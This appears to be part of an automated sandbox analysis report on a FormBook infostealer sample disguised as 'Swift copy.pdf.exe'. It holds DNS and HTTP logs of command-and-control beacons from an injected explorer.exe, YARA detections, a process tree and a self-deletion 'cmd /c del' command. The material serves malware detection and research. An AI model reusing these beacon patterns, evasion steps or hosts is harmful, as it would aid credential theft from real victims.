                                                                Apr 12, 2021 09:15:43.857230902 CEST8.8.8.8192.168.2.60xdc16No error (0)www.stepmed.life5.101.123.53A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:05.736423969 CEST8.8.8.8192.168.2.60xc251No error (0)www.stepmed.life5.101.123.53A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:10.090064049 CEST8.8.8.8192.168.2.60x23ceNo error (0)www.agenciaorange.netagenciaorange.netCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:16:10.090064049 CEST8.8.8.8192.168.2.60x23ceNo error (0)agenciaorange.net51.222.80.112A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:15.687482119 CEST8.8.8.8192.168.2.60x752eNo error (0)www.technomark.xyztechnomark.xyzCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:16:15.687482119 CEST8.8.8.8192.168.2.60x752eNo error (0)technomark.xyz174.136.25.55A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:21.877540112 CEST8.8.8.8192.168.2.60x3b69No error (0)www.indiafoodtraveling.com204.11.56.48A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:27.634377003 CEST8.8.8.8192.168.2.60xffd4No error (0)www.marktheoilguy.commarktheoilguy.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:16:27.634377003 CEST8.8.8.8192.168.2.60xffd4No error (0)marktheoilguy.com184.168.131.241A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.wapgoals.com
                                                                • www.criticalredux.com
                                                                • www.rileysboutique.com
                                                                • www.agenciaorange.net
                                                                • www.technomark.xyz
                                                                • www.indiafoodtraveling.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.64972634.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:15:16.607167006 CEST1667OUTGET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.wapgoals.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:16.906033039 CEST1691INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Mon, 12 Apr 2021 07:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "60733cbf-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.64973345.33.51.10080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:15:22.197308064 CEST2275OUTGET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.criticalredux.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:22.406625032 CEST2276INHTTP/1.1 302 Found
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 12 Apr 2021 07:15:22 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                status: 302 Found
                                                                cache-control: no-cache
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-permitted-cross-domain-policies: none
                                                                x-xss-protection: 1; mode=block
                                                                x-request-id: a007ddf2-61de-4f30-aacd-9fecf27575bf
                                                                location: https://fireside.fm/
                                                                x-download-options: noopen
                                                                x-runtime: 0.006187
                                                                x-frame-options: SAMEORIGIN
                                                                x-content-type-options: nosniff
                                                                x-content-type-options: nosniff
                                                                Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 73 69 64 65 2e 66 6d 2f 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: 56<html><body>You are being <a href="https://fireside.fm/">redirected</a>.</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.64973974.208.236.8780C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:15:27.665319920 CEST6594OUTGET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.rileysboutique.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:27.830058098 CEST6595INHTTP/1.1 302 Found
                                                                Content-Type: text/html
                                                                Content-Length: 0
                                                                Connection: close
                                                                Date: Mon, 12 Apr 2021 07:15:27 GMT
                                                                Server: Apache/2.4.10 (Debian)
                                                                Cache-Control: no-cache
                                                                Location: https://rileysboutiqueshop.company.site//ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.64975351.222.80.11280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:16:10.229217052 CEST6712OUTGET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.agenciaorange.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:10.371033907 CEST6713INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:16:10 GMT
                                                                Server: Apache
                                                                Content-Security-Policy: upgrade-insecure-requests;
                                                                Location: https://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t
                                                                Content-Length: 351
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 67 65 6e 63 69 61 6f 72 61 6e 67 65 2e 6e 65 74 2f 69 66 6e 65 2f 3f 41 6a 52 3d 38 47 6a 47 4d 39 67 48 30 4a 67 50 54 72 31 66 50 56 33 35 6d 73 73 6d 41 38 44 64 62 74 30 79 36 45 4b 6c 56 6d 34 4f 52 48 45 71 69 74 71 6c 42 61 44 42 73 4d 4b 68 75 30 6a 71 63 72 6d 78 41 4b 58 35 6b 66 47 55 41 77 3d 3d 26 61 6d 70 3b 6e 64 6e 64 73 4c 3d 2d 5a 68 34 58 7a 59 78 68 48 56 64 61 36 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&amp;ndndsL=-Zh4XzYxhHVda6t">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.649754174.136.25.5580C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:16:15.850569963 CEST6714OUTGET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.technomark.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:20.034461975 CEST6715INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:16:15 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.4.16
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://technomark.xyz/ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.649755204.11.56.4880C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:16:22.041131020 CEST6716OUTGET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.indiafoodtraveling.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:22.350006104 CEST6718INHTTP/1.1 200 OK
                                                                Date: Mon, 12 Apr 2021 07:16:22 GMT
                                                                Server: Apache
                                                                Set-Cookie: vsid=918vr3657573821812533; expires=Sat, 11-Apr-2026 07:16:22 GMT; Max-Age=157680000; path=/; domain=www.indiafoodtraveling.com; HttpOnly
                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_IRV7pOc0Xm/9416N7uYXLSgtMDYU4DL2U8RHP9DMTpfL2oM/3OsPGmGbiO5yvU1LU4WYCsGVV53fEp5zRzdaiQ==
                                                                Keep-Alive: timeout=5, max=115
                                                                Connection: Keep-Alive
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 35 65 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 4f 48 70 6b 55 6b 49 30 59 30 51 78 55 57 52 6a 55 6e 56 42 56 32 38 34 61 48 42 77 63 6a 51 32 52 6d 56 6b 5a 6c 68 4e 59 55 35 59 65 45 63 79 4d 7a 56 47 5a 6d 35 52 63 46 70 78 65 55 4e 47 56 58 45 72 57 54 6c 35 4e 48 5a 52 64 32 39 45 55 32 6c 75 57 6b 77 79 61 32 52 59 61 7a 64 31 53 7a 4e 49 4e 33 4a 69 62 47 67 30 65 6b 31 6c 54 54 64 71 55 46 42 50 57 54 45 31 63 6a 46 35 53 33 70 42 55 6a 56 4c 4c 31 46 74 57 46 55 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e
                                                                Data Ascii: 5e38<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.indiafoodtraveling.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.indiafoodtraveling.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5YeEcyMzVGZm5RcFpxeUNGVXErWTl5NHZRd29EU2luWkwya2RYazd1SzNIN3JibGg0ek1lTTdqUFBPWTE1cjF5S3pBUjVLL1FtWFU9&b="+abp;document.body.


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                Analysis Process: Swift copy.pdf.exe PID: 6628 Parent PID: 5964

                                                                General

                                                                Start time:09:14:18
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\Swift copy.pdf.exe'
                                                                Imagebase:0x1c0000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                Analysis Process: Swift copy.pdf.exe PID: 6896 Parent PID: 6628

                                                                General

                                                                Start time:09:14:28
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Imagebase:0x110000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                Analysis Process: Swift copy.pdf.exe PID: 6904 Parent PID: 6628

                                                                General

                                                                Start time:09:14:29
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Imagebase:0x500000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 6904

                                                                General

                                                                Start time:09:14:31
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff6f22f0000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: autoconv.exe PID: 7136 Parent PID: 3440

                                                                General

                                                                Start time:09:14:45
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                Imagebase:0xbb0000
                                                                File size:851968 bytes
                                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Analysis Process: cscript.exe PID: 6180 Parent PID: 3440

                                                                General

                                                                Start time:09:14:46
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                Imagebase:0x30000
                                                                File size:143360 bytes
                                                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                Analysis Process: cmd.exe PID: 6248 Parent PID: 6180

                                                                General

                                                                Start time:09:14:49
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
                                                                Imagebase:0x2a0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: conhost.exe PID: 724 Parent PID: 6248

                                                                General

                                                                Start time:09:14:50
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff61de10000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >